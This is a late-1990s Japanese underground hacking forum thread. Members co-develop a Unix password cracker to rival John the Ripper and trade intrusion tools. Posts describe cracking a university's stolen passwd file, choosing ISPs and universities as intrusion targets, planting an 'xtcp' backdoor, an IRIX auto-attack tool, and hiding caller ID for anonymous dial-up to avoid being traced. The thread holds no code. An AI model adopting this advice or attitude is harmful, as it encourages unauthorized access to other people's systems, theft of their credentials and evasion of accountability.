| 【名 前】SideWalk 【タイトル】ひゃ〜すげ! 11/24 06:41 |
|
| 【メッセージ】 しょっぱなからGUIで来るとは思ってなかったのでメニューの時点で 感動してしまいました(笑)。 とりあえずWin95とNTで動作させてみましたが、Johnにひけは 取ってないですね。多少の遅さは操作性で相殺でしょう。 欲を言うと、 「userID:Pass::::」に直してやらないと読み込んでくれない passファイルを、「userID:Pass」でも読み込めたら便利かな…と。 まだ、いわゆるpotのようなファイルは作成されないんですね。 最初「過程をファイルに保存」がそれだと思ってチェック入れて 走らせてたんですがマニュアルとファイルサイズ見てたまげました(笑)。 あと、物凄く贅沢を言わせて頂きますと。 rulesは先頭以外の任意のカラムでも大文字にしたいです。 現状のビットを立てたidr以外にも、任意の文字を任意の文字列に 置換できる設定がTextファイルであれば最高ですね。 カナ打ちの人用とか、あいうえお数字置換の人とかもヒットさせられ ますから。 あ、いやいや、このままでも凄い出来ですよ! |
| 【名 前】うにゅん 【タイトル】配布 11/24 01:05 |
unewn4th@usa.net |
| 【メッセージ】 遅くなりました。まだα版ですが、とりあえず配布します。 実験協力者のみなさんは、メール読んで下さいね。 あと、「ちょっと使ってみたい」人も、メールくれれば配布します。 |
| 【名 前】うにゅん 【タイトル】re:(2)ツール名 11/22 07:31 |
|
| 【メッセージ】 ツール名、いろいろご意見ありがとうございました。 石川五右エ門に決定しようかと思います。 「切り裂きjohnより、よく切れる」がキャッチフレーズです。 う〜ん、大丈夫なんだろうか... で、五右衛門のα2バージョンは、とりあえず動作確認ってとこ まで出来てます。とりあえず、家でちゃんと動けば実験協力者 の方(+kazutさん)にのみ配布します。 実験ということで、みなさんそれぞれの大きさの辞書、rulesで クラックし、johnと性能評価をお願いします。 クラック速度が、まだjohnに追いついてないんで、とりあえず クラック率の報告をお願いします。協力者のみんさんは、 そろそろ辞書を大きさ別、タイプ別等で数種類用意してください。 |
| 【名 前】Hariru 【タイトル】re:(1)ツール名 11/22 06:53 |
|
| 【メッセージ】 >う〜ん、私としては石川五右エ門がちょっと好きかなぁ。 おおっ。私の出した名前を気に入ってくれているとは、感謝の至りです。 >あと、白木葉子はjoe(ID=PASSWDね)を愛する人です。 >「明日のジョー」でサーチしてみましょう。 な、なるほど・・・。 そんな意味があったとは知りませんでした。 これを知ると、白木葉子のネーミングセンスはずば抜けていいですね。 私は何も手伝えないと思いますが、 ツールづくりの方、頑張ってくださいませ。 では。 |
| 【名 前】Rorrim 【タイトル】Joeの語源って? 11/22 01:29 |
49-hack@ijk.com |
| 【メッセージ】 たしかJOEには「平均的な」とか「奴、野郎」 みたいな意味があるのでそれが語源かも知れないですね。 こんど調べてみます。 |
| 【名 前】pargatory 【タイトル】白木葉子 11/21 11:29 |
|
| 【メッセージ】 し・・・ 知りませんでした・・・ 明日のジョーにかけているとは・・・ 奥が深い・・・ さすが、うにゅんさん・・・ あと、個人的な疑問なのですが、 JOEの由来は何なんでしょう・・・ 製作者の名前なのでしょうか? 最初、クラッシャーJOE(かなり古いアニメ) にかけているのかと思ってましたが・・・ では・・・JOHN君は・・・? |
| 【名 前】うにゅん 【タイトル】re:(1)いかがお過ごしですか? 11/21 01:31 |
|
| 【メッセージ】 >英語サイトにも手を出しつつあるのですが、どこのサイトがいいんでしょうか? まぁ、月並みですが、とりあえずPacketStormは毎日チェック しています。RootShellは数日置きくらい。 読み物は、 http://www.hackers-supply.com/ にいいのがありますよ。 |
| 【名 前】うにゅん 【タイトル】re:(1)いかがお過ごしですか? 11/21 01:31 |
|
| 【メッセージ】 >英語サイトにも手を出しつつあるのですが、どこのサイトがいいんでしょうか? まぁ、月並みですが、とりあえずPacketStormは毎日チェック しています。RootShellは数日置きくらい。 読み物は、 http://www.hackers-supply.com/ にいいのがありますよ。 |
| 【名 前】P&A 【タイトル】いかがお過ごしですか? 11/20 23:58 |
butsuri@anet.ne.jphttp://www.cool.ne.jp/light/ |
| 【メッセージ】 最近は風邪を引いてダウン気味です。 えっと話題は変わりますが、この世界に入ってもう半年・・・全然skillがあがりません。 変わったことといえば、友達と話しているときにskillって言う言葉を使ってそれ何語と いわれたくらいです。 英語サイトにも手を出しつつあるのですが、どこのサイトがいいんでしょうか?皆さん のよく行く英語サイトを教えてくださいな。 タイトル・・・「当たり前田のクラッカー」なんて・・・ダメですね。 |
| 【名 前】HiRoShi 【タイトル】re:(1)ツール名 11/20 21:51 |
|
| 【メッセージ】 クラッカーといえば加山雄三なので、「若大将」はどうでしょう?(笑) 実験する時は協力しますので制作頑張ってください。 |
| 【名 前】reverse 【タイトル】re:(1)始めまして。 11/20 20:13 |
esrever@usa.nethttp://members.tripod.com/~reverse/ |
| 【メッセージ】 最近、ここでスキャンして遊んでる。 しかし、遊べるなぁ、ここ。 下準備は大事だよねぇ。 http://cgi.blackout.org/_/index.html とりあえず、自分のスキルにあったとこ狙ってます。 たとえば、OSはナニのバージョンはアレとかね。 |
| 【名 前】うにゅん 【タイトル】ツール名 11/20 18:20 |
unewn4th@usa.net |
| 【メッセージ】 色々出ましたね〜 横浜クラッカーズ、クラック山田、クラックです 力石 徹、丹下段平、ウルフ金串、石川五右エ門 鼠小僧、ユダの痛み、JPHACK、クラックザムライ クラックダイミョー う〜ん、私としては石川五右エ門がちょっと好きかなぁ。 あと関連タイトルとして、峰不二子、次元大介ってのもありますね。 それはさておき、さっさと作らないと... あと、白木葉子はjoe(ID=PASSWDね)を愛する人です。 「明日のジョー」でサーチしてみましょう。 |
| 【名 前】うにゅん 【タイトル】re:(1)UPしましたよ(Academy) 11/20 18:10 |
unewn4th@usa.net |
| 【メッセージ】 >Academyの第3回「変数と計算と関数」UPしました。 おお!了解しました。 今日中にindexとacademyを更新します。 >勝手ながら第3回は「変数と計算」のみにして、 >別枠で「制御文」(if,while,etc)をして >「関数」に行きたいと思います。 そうですね。このほうが量的に丁度いいでしょうね。 >僭越ながら、「制御文」「関数」共々書かせてもらいます。 すいませんね〜。よろしくお願いします。 ちなみに私の初あたっくは、私の使ってるワークステーション (SGI O2, IRIX6.3)です。その後は、私んとこの研究室。 UNIXの種類が豊富なので、いまでもかなり遊べます。 |
| 【名 前】ムチ 【タイトル】こんにちは 11/20 16:51 |
|
| 【メッセージ】 はじめましてこんにちは。 ムチといいます。興味深くテキストみさして貰いました。 無知な僕には大半暗号のようでしたが(笑) しかしなんかかっこいいなー、とあこがれを抱きます。 そしてせっかくなのでニューツールの名前の案を。 クラックザムライ、クラックダイミョー 少々いちきっぽいですが(笑) ツール作成がんばってください。それでは。 |
| 【名 前】Rorrim 【タイトル】UPしましたよ(Academy) 11/20 15:22 |
49-hack@ijk.com |
| 【メッセージ】 Toうにゅんさん Academyの第3回「変数と計算と関数」UPしました。 勝手ながら第3回は「変数と計算」のみにして、 別枠で「制御文」(if,while,etc)をして 「関数」に行きたいと思います。 僭越ながら、「制御文」「関数」共々書かせてもらいます。 さて・・・名前は何がいいかな〜。 JPHACK?(元ネタ、JPNIC)面白くないな。 やっぱ「明日のジョー」関連ですかね〜。 P.S. 私の初89は自分のISPでしたよ。 後のターゲットは、友達のISPとか・・・ 基本的には興味のある所ですかね〜、大学とか。 |
| 【名 前】chaos 【タイトル】始めまして。 11/20 12:27 |
|
| 【メッセージ】 始めまして、chaosともうします。 最近アングラ系に目覚めて、このページを見つけました。 とても勉強になっています。 くだらない質問ですが、皆様がISPなどに侵入するとしたら、 どうやってターゲットを探しますか? ポートスキャンなどで無差別に探すのですか? どのような基準でねらいを決めますか? このようなくだらない質問ですが、初心者なのでお許しを。 |
| 【名 前】Hariru 【タイトル】Tool名 11/20 10:59 |
|
| 【メッセージ】 何だかすごいことを始めているようですね。 打倒john the ripperですか・・・。 私には空恐ろしくて、発言さえもできないようなことですよ。 って、発言してますが。(笑) Tool名の方ですが、 天下の大泥棒「石川五右衛門」なんてどうですか? あるいは「鼠小僧」とか。 どっかでありそうな名前ですが・・・。 Coolでいくなら、 「ユダの痛み(Judas's pain)」ってのもありますけど。 これはBASTARDからのパクリで、一応和製です(だと思います)。 「白木葉子」の由来、私にはわかりません。 マンガか何かの主人公なのでしょうか。 開発者のみなさま、Toolづくり頑張ってください。 |
| 【名 前】うにゅん 【タイトル】re:(1)がんばれ〜、開発者達 11/20 02:06 |
unewn4th@usa.net |
| 【メッセージ】 >候補がないんならここで募集してみます? 名前負けしないようにしないと... しかし、John the ripperっていい名前ですよね。 やっぱ和製ってことで、 横浜クラッカーズ クラック山田 クラックです(DESね) .... いかんいかん。 「白木葉子」は由来からして我ながらGoodなネーミング だったと思うんですが、ネタがもうないです〜 シリーズものってことで、「力石 徹」、「丹下段平」 あと「ウルフ金串」ってのも... なんか、いいのありますか? |
| 【名 前】四苦八苦 【タイトル】御久しぶりです 11/20 02:00 |
|
| 【メッセージ】 Tool作りなんて すっごい計画をたててらっしゃるようですね。 頑張ってください。 >>Rorrimさん Tool制作に参加してなかったの? |
| 【名 前】Rorrim 【タイトル】がんばれ〜、開発者達 11/20 01:42 |
49-hack@ijk.com |
| 【メッセージ】 きっと日本のUG界(?)の偉業と成るはずのTooLずくり、 心から応援しております。 でもTooLの名前ってなんに成るんでしょうか? 候補がないんならここで募集してみます? unix-PasswordCrackerじゃ味気ないような気がして・・・ |
| 【名 前】kazut 【タイトル】re:(1)実験協力者のみなさん 11/19 23:03 |
|
| 【メッセージ】 >βはkazutさんの手腕にかかってきます。 >kazutさん、いっちょよろしくお願いしますよ〜 ばてばてでちょっと遅れちゃってます〜m(_)m 明日絶対書きますね〜<こればっか(^^;; |
| 【名 前】くろーりく 【タイトル】初 11/19 19:02 |
|
| 【メッセージ】 初心者です。 うちの大学のpasswdファイルを手にいれることができました。 johnの名前は知っていたものの持っていなかったので、 ネットで探して拾ってきて実行してみることにしました。。 いや、ビックリ。 実際にパスワードが解読されるのを見るのは初めてなので、、、 jo,johnって凄い。 簡単なパスワードつけてる人が多いものですね。 学校の方からは結構注意がいっているはずなのですが。 いくら学校側がsecurityに配慮しても使う側がこれでは、、、 rootはshadow化されていたので、ダメでした。 そううまくは行かないものです。 打倒john頑張ってください。 |
| 【名 前】うにゅん 【タイトル】実験協力者のみなさん 11/19 17:44 |
unewn4th@usa.net |
| 【メッセージ】 αバージョンは、速度的な問題があり、現在 アルゴリズムを再検討中です。 パスクラックは速度も性能の一つですから) 今週中には、速度向上版のα2ができます。 α2で配布を開始します。 α2はたぶんまだjohnにはかなわないと思いますが... βはkazutさんの手腕にかかってきます。 kazutさん、いっちょよろしくお願いしますよ〜 あと、連絡等はココで行う予定です。実験に参加して くださるみなさんは、マメにチェックしてくださいね。 |
| 【名 前】うにゅん 【タイトル】re:(1)打倒!John-THE-Ripper 11/19 16:16 |
unewn4th@usa.net |
| 【メッセージ】 >開発ベースはやっぱりUNIXでしょうか? Win & UNIXです。 Macは、ちょっと移植が大変なので考えてないです。 すいませんね>Macユーザさん しかし、ノーパソにSolarisですか。 考えただけも しんどそうですね... |
| 【名 前】Rorrim 【タイトル】打倒!John-THE-Ripper 11/19 10:55 |
49-hack@ijk.com |
| 【メッセージ】 すごい事考えてますね〜。 開発ベースはやっぱりUNIXでしょうか? う〜む、MaC版でも出して欲しいところですが、 需要がないからやっぱり無理なんでしょうね?(笑) 最近、ノートパソコンにSolaris2.6を導入してるんですけど なんだか最初(ディスプレイの設定)から行き詰まり気味・・・ この調子だとLAN接続は何時になる事やら。 いい本ってないですかね〜? いまんとこ 「UNIXネットワークの日々・水越賢治・オーム社」 「SUNシステム管理・下山智明・アスキー出版局」 なんて読んでます。 |
| 【名 前】kazut 【タイトル】re:(1)パスクラック 11/18 23:26 |
http://members.xoom.com/k2japan/ |
| 【メッセージ】 >kazutさんと 役に立てるかわかんないんですが がんばって見ます(^^;; 打倒Johnですね |
| 【名 前】うにゅん 【タイトル】re:(1)自前shadow 11/18 20:45 |
unewn4th@usa.net |
| 【メッセージ】 >って、自分で手に入れたshadowって意味ですか? 自前で用意可能なshadowってことです。 もちろん、crypt()とか使った自前のでもいいですが... shadowの配布は、ちょっとアレですからね。 |
| 【名 前】reverse 【タイトル】自前shadow 11/18 20:38 |
esrever@usa.net |
| 【メッセージ】 って、自分で手に入れたshadowって意味ですか? でもそれは「生shadow」ですよねぇ。 あれ?生って、イキの良い新鮮なshadowってことかな? |
| 【名 前】SKILLのないSUN管理者 【タイトル】頑張って下さい 11/18 14:32 |
|
| 【メッセージ】 >そういえば、SKILLのないSUN管理者さんは >info@yftがハックの話題で盛り上がってた時のヒトですからねぇ。 あの頃の話題は楽しかったです♪ >私の昔のHP知ってるんですね。 >あぁ、なつかしい…。 わたしはあのHPが大好きでした♪ これからも頑張って下さい!! |
| 【名 前】うにゅん 【タイトル】メアド変ります 11/18 11:37 |
unewn4th@usa.net |
| 【メッセージ】 メアド変ります。 unewn4th@usa.net です。 the-pentagon.comは、どうやら本格的に死にかけです。 (またまた、壊れてる模様...) |
| 【名 前】うにゅん 【タイトル】re:(1)ふむ 11/18 02:48 |
unewn3rd@the-pentagon.com |
| 【メッセージ】 >関係ないけどDES暗号解読のキーはNSAにありですね。 調べたんですけど、結構難解です。 あぁ、CrackingDES、もっと立ち読みしてくればよかった... >BASEのミラーはフレーム版ですか(^^) カウンターの関係上、ああなってます。 たぶん、今はネスケだと変になりますが、近日中に修復します。 ココから.toなんて所にftpすると管理者がピピっとなって チェックしかねないですから、今はトオル氏にまかせっきりに なっちゃってますが... そのうち、コッソリとウチの大学のアレをナニしてOKに する予定です。 |
| 【名 前】幸一 【タイトル】WORDのパスワード 11/18 01:42 |
|
| 【メッセージ】 だれかワード98のワード文書のパスをクラックできる方 いらっしゃいませんか?分かる方是非ご指導してください。 |
| 【名 前】k00L 【タイトル】ふむ 11/18 01:29 |
http://BASE.OC.TO |
| 【メッセージ】 打倒John・・・ 関係ないけどDES暗号解読のキーはNSAにありですね。 誰かNSAに侵入して解読ツール取って来てくれませんか(笑) >うにゅん氏 BASEのミラーはフレーム版ですか(^^) こちらこそお世話になります。 |
| 【名 前】うにゅん 【タイトル】パスクラック 11/18 00:47 |
unewn3rd@the-pentagon.com |
| 【メッセージ】 kazutさんとunix-PasswordCrackerの共同開発を やることになりました。打倒johnが目標です。 自前Shadow持ってて、Win or UNIX使ってる人で実験に 参加してもらえる方がいましたら、メール or カキコ お願いします。 実験内容ですが、 1. 大・中・小様々な辞書でshadowをクラックする。 2. normal-john、rule変更john等とクラック性能と時間を比較する です。 ルール追加等のコメントも大歓迎です。 なお、実験ですので、クラックの実際の結果(生パスワード等) や生shadow、およびshadowの出所の公開等は差し控えてくださいね。 |
| 【名 前】うにゅん 【タイトル】連絡 11/17 14:57 |
unewn3rd@the-pentagon.com |
| 【メッセージ】 BAckSEctionにミラーを出しました。 ココからpingしましたが、圧倒的にfortuneより早いです。 まだ、ちょっと未完成な部分もありますが、よろしくね。 一応、今月中くらいを目標に、全面移行する予定です。 k00Lさん、BEAMZさん、色々お世話になります。 |
| 【名 前】うにゅん 【タイトル】re:(1)初めてのカキコ♪ 11/17 13:08 |
unewn3rd@the-pentagon.com |
| 【メッセージ】 >依然のHPに遊びに行ったら、 >終了していたみたいで・・・ もしかして、 http://www.fortunecity.com/skyscraper/byte/551/unyun.html のことですか? そういえば、SKILLのないSUN管理者さんはinfo@yftがハックの 話題で盛り上がってた時のヒトですからねぇ。私の昔のHP知ってる んですね。あぁ、なつかしい…。ここには、旧bisqueさんの ページもありました。しかしAquaさんどこにいるんだろ。 |
| 【名 前】うにゅん 【タイトル】re:(1)(^^;; 11/17 13:01 |
unewn3rd@the-pentagon.com |
| 【メッセージ】 >txtファイル開けるまでに5分くらい躊躇いました(笑) 化けるもので…。添付ファイル名も悪意のないただの textファイルですよ。 IEの場合は、私のメールはtextfileの添付になると思い ますが、みなさん特になにも起らないですから心配しない でくださいね。 >当方は移転を心待ちにしていますが、急いではおりませんので 私はこのトロくてよく死ぬfortuneを早く出たいんですが、 色々とありまして…。 |
| 【名 前】SKILLのないSUN管理者 【タイトル】初めてのカキコ♪ 11/17 12:54 |
|
| 【メッセージ】 凄いHPですね!!! びっくりしました!!!! 依然のHPに遊びに行ったら、 終了していたみたいで・・・ がっかりしていたのですが・・・ 新しいHPがあるとは!!(驚)←気づくのが遅いかも・・・ 今後とも足を運ばさせていただきますね♪ あと、このような私にメールを送っていただき、 誠に、有り難うございましたM(__)M これからもよろしくお願い致します。 |
| 【名 前】HiRoShi 【タイトル】re:(4)やっちまった.... 11/16 02:00 |
|
| 【メッセージ】 >NGDってなんでしょ?? NGD softwareっていうとこの事です。NGDだけじゃ普通分かんないですね。スミマセン Packetboy(パケット監視)とかEtherboy(接続経路監視)とかが有名かも? Etherboyは昔PCComputing入ってたような気がする...たぶん(^^; Etherboyは見た目がきれいです。 >モニタリングソフトはどれも高価ですから.. ですねぇ。 >目的がソレだけでしたら... ソレだけなんで(笑)使ってみます。 参考になりました。有り難うございます。 |
| 【名 前】reverse 【タイトル】re:(3)やっちまった.... 11/16 01:44 |
esrever@usa.nethttp://members.tripod.com/~reverse/ |
| 【メッセージ】 NGDってなんでしょ?? 私はNetXRayっていうの使ってます。(for Windows) ftpserchで調べました ^^; モニタリングソフトはどれも高価ですからtcpdumpがいいかもしれませんね。 目的がソレだけでしたら、十分、使えると思います。 プロトコルの勉強には、ちゃんとした製品が欲しい所ですが.... |
| 【名 前】HiRoShi 【タイトル】re:(2)やっちまった.... 11/16 01:00 |
|
| 【メッセージ】 >モニタリングして、AccountGetしようとしたヤツをとっ捕まえましょう。 その手がありましたね。 けどモニタリング関係はsuniffer仕掛けるぐらいしかやった事無いんでどうなるやら...(sunifferは自分でやった事になんないか) NGDのモニタリングソフトはアダプタの関係で使えなかったし、 まず使いやすいWin用モニタリングソフト探さないと。 sneakerがWinで使えればなぁ。 何かおすすめのはありませんか? |
| 【名 前】うにゅん 【タイトル】re:(1)祝!全面改宗 11/15 18:58 |
unewn3rd@the-pentagon.com |
| 【メッセージ】 >爆笑です。表現方法に苦労の後が見えますね。 わりと苦労しました(笑) 他にも、「この表現も変えたら?」ってのがあったら、みなさんカキコ お願いしますね。 |
| 【名 前】うにゅん 【タイトル】re:(1)改宗ですか 11/15 12:07 |
|
| 【メッセージ】 >でもSUNとかIRIXのがおしゃれ。 Solarisは何とかなるにしても、IRIXは苦しいですぅ。 私も自宅の方にSGIのマシンがほしいんですけど、お金がないっす。中古のINDYでいいんですけどねぇ。 |
| 【名 前】うにゅん 【タイトル】re:(1)っと 11/15 12:03 |
|
| 【メッセージ】 うちは、すぐ例のサーバにミラーとして移します。 ちょっと、問題がありまして、しばらくfortuneと平行してってことになります。 完了したら、すぐにお知らせします。 |
| 【名 前】AC 【タイトル】っと 11/15 00:53 |
|
| 【メッセージ】 あ、UNYUNさんLinkしてくれたんですね。 こっちからもかけ・・・たいのですが、サーバー移動、なかなか話し進まないですなぁ。 ぐすん。 |
| 【名 前】harmonia 【タイトル】改宗ですか 11/14 23:03 |
|
| 【メッセージ】 お疲れ様です。 ところで、最近読んでいた「インターネットセキュリティ プロフェッショナルリファレンス」ですが、下巻(運用編)の後半は、これはウィルスの仕様書だなあ(笑。 あと、自宅にLAN入れてLINUX入れたのでいろいろやってみます。でもSUNとかIRIXのがおしゃれ。 |
| 【名 前】Rorrim 【タイトル】祝!全面改宗 11/14 17:24 |
49-hack@ijk.com |
| 【メッセージ】 改宗、おめでとうございます。 これからも、発火に嫌われる様、 世界のセキュリティ・アップに貢献しましょう(笑) アカデミ〜のテキストで解らないぞ〜って人いますか? そう言う所があったら是非教えてください。 P.S. >PS改 for UNIX >管理者のヒトは、監視デーモンの隠しに使えます。 爆笑です。表現方法に苦労の後が見えますね。 |
| 【名 前】うにゅん 【タイトル】re:(1)shadow抜き 11/14 08:41 |
unewn3rd@the-pentagon.com |
| 【メッセージ】 >Linux以外でもあったら教えて頂けません? pingでoverflowが起きるヤツなら、たぶんどれでも応用できますよ。 コードがあるかどうかは知りませんが。 |
| 【名 前】うにゅん 【タイトル】re:(1)やっちまった.... 11/14 08:23 |
unewn3rd@the-pentagon.com |
| 【メッセージ】 >あ〜超ムカツク!(爆死) レジストリだけだと、ちょい不安ですね。他にも自動起動させる 方法なんてた〜くさんありますから。やっぱフォーマットですね。 モニタリングして、AccountGetしようとしたヤツをとっ捕まえ ましょう。 |
| 【名 前】うにゅん 【タイトル】re:(1)全面改修 11/14 08:17 |
unewn3rd@the-pentagon.com |
| 【メッセージ】 >ところで、いつの間にかDocumentにあったsnifferのところ、 >アップされないまま消えてません? 代表的な方法でしか検査ができないんです。 (全ファイル検査とか) ソレ以外の方法でも、正規ISP(3つほど)で試したんですが、 うまくいかず... まぁ、ずっとCommingSoonじゃ悪いので消しましたが、一応 継続して調査します。 |
| 【名 前】Hariru 【タイトル】全面改修 11/14 07:14 |
|
| 【メッセージ】 全面改修(改宗?)されたようですね。 内容の方は変わってないみたいですが。(嬉しいっす) まあ、私としては末永く存在して欲しいHPですので、 なんだかほっとした気分です。 ところで、いつの間にかDocumentにあったsnifferのところ、 アップされないまま消えてません? (Comming Soon)ってことだったので、期待してたのに・・・。 一応、Toolboxからいけるみたいなので、まだ期待してます。 |
| 【名 前】SideWalk 【タイトル】shadow抜き 11/14 02:06 |
|
| 【メッセージ】 ちわっす。 最近ping shadow抜きという大変便利なコマンドを知り セキュリティーに役立てております。 Linux以外でもあったら教えて頂けません? |
| 【名 前】HiRoShi 【タイトル】やっちまった.... 11/13 20:58 |
|
| 【メッセージ】 明け方ネットしながらファイルの整理してたら、うっかりAccountgetterを実行してしまった〜(TT) 一瞬、窓がひらいたのが見えたんで確実に何か色々と(笑)抜かれてるハズ。やばいよコリャ。 抜かれたのがアカだけならいいんだのになぁ。自分のじゃないしね(爆) レジストリから削除したりしたけど、確実に消せた保証はないのでHDフォーマットするしか 道はなさそう。トホホ・・・ あ〜超ムカツク!(爆死) |
| 【名 前】うにゅん 【タイトル】re:(1)改宗(笑)おつかれさまでした。 11/13 19:55 |
unewn3rd@the-pentagon.com |
| 【メッセージ】 >ちょっと見ましたが、以前を知っていると「表現」 >がかなり楽しいです(^^; 「表現」選ぶのに、ちょっと苦労しました(笑) >みなさん なんか、メール鯖(the-pentagon.com)が調子悪いです。 「レス来てないぞ」って方は、すいませんがICQかBBSに もいっかいお願いします。 |
| 【名 前】walkon 【タイトル】改宗(笑)おつかれさまでした。 11/13 18:52 |
walkon@24h.co.jp |
| 【メッセージ】 お久しぶりの書き込みです。 見事な改宗ですね。 ちょっと見ましたが、以前を知っていると「表現」 がかなり楽しいです(^^; >C言語の本は、言語を全くやったことない人にとっては、 >どれもこれも書きすぎで分かりにくいですからね。 ほんとにそうですよね。 しかも、知りたいことはきちんと書いてなかったりして。。。 Rorrimさん続き頑張ってください!! |
| 【名 前】うにゅん 【タイトル】完了 11/13 17:31 |
unewn3rd@the-pentagon.com |
| 【メッセージ】 改宗が完了しました。 あまり内容は変ってませんが(笑) とりあえず、白木葉子 for UNIXがVersionUPしました。 機能は今までと同じですが、高速化とソースがかなり コンパクトになりました。 |
| 【名 前】うにゅん 【タイトル】いまさら 11/13 09:08 |
unewn3rd@the-pentagon.com |
| 【メッセージ】 いまさら書くのもなんですが、しばらく閉鎖になります。 表ページとしてリニューアルしますので。 今、コンテンツの「表現」をなおしてます。 |
| 【名 前】うにゅん 【タイトル】re:(1)なんていい人なんだ〜 11/13 09:06 |
unewn3rd@the-pentagon.com |
| 【メッセージ】 >なんていい人なんでしょ〜、私のTeXTを待っているなんて。 たぶん、他にも結構いるんじゃないかな。 C言語の本は、言語を全くやったことない人にとっては、 どれもこれも書きすぎで分かりにくいですからね。 Rorrimさん、これかもお願いしますね。 >訳してるんで気長にお待ちください。 Millenium Hackingや、alt2600もいいですねぇ。 よく書けてます。 |
| 【名 前】うにゅん 【タイトル】re:(1)ふぅ〜 11/13 08:58 |
unewn3rd@the-pentagon.com |
| 【メッセージ】 >xtcpで 危うく私がタ〜ゲットの仲間入りするところだった・・・(笑) 私も専用線のノートに入れっぱなしだったです(笑) みなさんも、気をつけましょう。 |
| 【名 前】うにゅん 【タイトル】re:(1)re 11/11 06:16 |
|
| 【メッセージ】 >こうも凄いとなんかアレですね、 >日本版のALT2600みたいなマガジンが発行できそうですね(笑) RZさんにそう言っていただけるとは、光栄ですね。 でもALT2600みたいに濃いのは、とても私じゃムリですよ(笑) やっぱり、よく書けてますよねぇ。 >要所要所でリンク張ってもよいでしょうか? ありがとうございます。お願いします。 でも、サーチエンジン登録はしないでくださいね(笑) |
| 【名 前】うにゅん 【タイトル】re:(1)うにゅん氏へ 11/11 05:45 |
|
| 【メッセージ】 >匿名PPP用にちまちまと使うことにします(笑)。 電話番号ログとってる可能性もありますので。 184つけると、とりあえずはバレないかもしれませんね。 あ、でも警察沙汰になると184も無意味ですので気をつけましょう。 |
| 【名 前】うにゅん 【タイトル】re:(1)おひさしぶりです。 11/11 05:41 |
unewn3rd@the-pentagon.com |
| 【メッセージ】 >xtcpをDLさせて いただきました。 近日中に、xtcpの周りを固めるツールを出す予定です。 これで、xtcpの仕込みが簡単になりますので、また 見に来てくださいね。あと、xtcpですが、UNIXから telnetすると、ちょっと表示がおかしくなるので、 そのバグもfix予定です。 |
| 【名 前】White_E 【タイトル】うにゅん氏へ 11/11 05:35 |
w_e@geocities.com |
| 【メッセージ】 メールを拝見、了解致しました。 私も目立つことはせずに匿名PPP用にちまちまと使うことにします(笑)。 御返事が遅くなって申し訳ありませんでした。 |
| 【名 前】うにゅん 【タイトル】re:(1)Backdoor & Auto Attacker 11/11 05:32 |
unewn3rd@the-pentagon.com |
| 【メッセージ】 >しかし、またもや、捕まりそうな危険ツールを...^^; ツール提供ってヤバいんですかねぇ。一応、ここのReadme First をちょっと変えておきました。これだけじゃ、不安... |
| 【名 前】U.S.K 【タイトル】勉強になります。 11/11 05:00 |
|
| 【メッセージ】 すごいですね。 tool等いろいろいただきました。 ありがとうございます。 |
| 【名 前】tom 【タイトル】re:(1)いやあ 11/11 04:07 |
|
| 【メッセージ】 また来ますね。 |
| 【名 前】tom 【タイトル】いやあ 11/11 04:04 |
|
| 【メッセージ】 ここ、すごいHPですね。 勉強になります。 |
| 【名 前】四苦八苦 【タイトル】おひさしぶりです。 11/10 23:57 |
|
| 【メッセージ】 xtcpをDLさせて いただきました。 なんか世話になりっぱなしで すいません。 |
| 【名 前】RZ 【タイトル】re 11/10 23:36 |
http://www.ugtop.com/defcon0/ |
| 【メッセージ】 こうも凄いとなんかアレですね、 日本版のALT2600みたいなマガジンが発行できそうですね(笑) ちょっとやってみたかったりもしますが、 (既にやっているところもありますが) どうも失速してるものが殆どなんで躊躇してしまいますね。 #独り言でした。 #あ、話はズレますが、要所要所でリンク張ってもよいでしょうか?>うにゅんさん |
| 【名 前】reverse 【タイトル】Backdoor & Auto Attacker 11/10 21:14 |
esrever@usa.nethttp://members.tripod.com/~reverse/ |
| 【メッセージ】 2セットいただきました。 しかし、またもや、捕まりそうな危険ツールを...^^; 個人的には侵入するまで、シェルコマンドを実行するまでが難しくて、 未だにIRIXのナニをシコシコやったりしてます。 やっぱりcgiとかjoeですかねぇ...常套手段ですが... |
| 【名 前】Hariru 【タイトル】re:(5)質問です.... 11/10 14:50 |
|
| 【メッセージ】 >それにしてもやっぱりプログラミングはセンスがないと駄目ですね。 >センスのあるうにゅんさんがうらやましい... >本当に尊敬します。 本当ですね。 私もそのセンスの恩恵にあずかりたいと思います。 でもそのほとんどが、まだ理解できていませんけど・・・。 視力のことについて。 やはりみなさん、視力よくないようですね。 私も中学まではよかったけど、パソコンするようになってから落ち始めた。 上には上がいるようなので、 落ちるとこまで落ちてみるのも一興かな、なんて思ったりしてます。 PS.hyper2のディスク交換やっと終わりましたね。朝、カキコしようとしたとき急にアクセスできなくなったけど、あのときがそうだったのかな。 |
| 【名 前】トオル 【タイトル】re:(2)tdm 11/10 10:07 |
|
| 【メッセージ】 おはようございます。 すっかり遅くなってしまいましたが、res有り難うございます。 >.logoutに変なの入ってませんか? えと、sh使っていたのですが、それがいけなかったのでしょうか? cshに替えればうまくいきました。 >ログアウトせず、端末を殺して終了するとかしてみてはどうでしょう。 shではダメでした。 shってゾンビを作れないのでしょか? マニュアル読んでみたのですが、それらしき事は書いて ませんでした。 どうも有り難うございました。 |
| 【名 前】うにゅん 【タイトル】いりxおーとあたっか 11/10 06:34 |
|
| 【メッセージ】 迷ったんですが、アップしてしまいました。 ちょっとたちの悪いツールです。 いりXに自動で色々なアタックをかけます(注:管理者用です)。 やっぱ、ちょっとアレですかね... |
| 【名 前】HiRoShi 【タイトル】re:(4)質問です.... 11/10 00:19 |
|
| 【メッセージ】 >手抜きっぽいヤツなら、私の作ったxtcpに入ってるトロイ >と同じ方法じゃないですか? 多分同じ流れなんだと思います。 それにしてもやっぱりプログラミングはセンスがないと駄目ですね。 センスのあるうにゅんさんがうらやましい... 本当に尊敬します。 >SnadBoyのソースも、そんなので金取るなってね。 ですね、根性悪いです。 |
| 【名 前】うにゅん 【タイトル】re:(1)Memory allocation error 11/09 11:40 |
unewn3rd@the-pentagon.com |
| 【メッセージ】 >改良版を作ります。 って、よく見ると、とんでもないボケをかましてました。 メモリ確保しすぎです。そりゃ、動かんわ。 ってことで、改良版をアップしておきました。 すいませんね。 |
| 【名 前】うにゅん 【タイトル】Memory allocation error 11/09 11:02 |
unewn3rd@the-pentagon.com |
| 【メッセージ】 ulwのMemory allocation errorは、ログが異常に大きい 場合に発生します。これは、手抜きしてログをいったん メモリに取り込んでいるためです。swapを増やすとかしない とダメです。 前にもこんなカキコがあったので、改良版を作ります。 2,3日後には、できると思います。 |
| 【名 前】うにゅん 【タイトル】re:(1)Server 11/09 10:59 |
unewn3rd@the-pentagon.com |
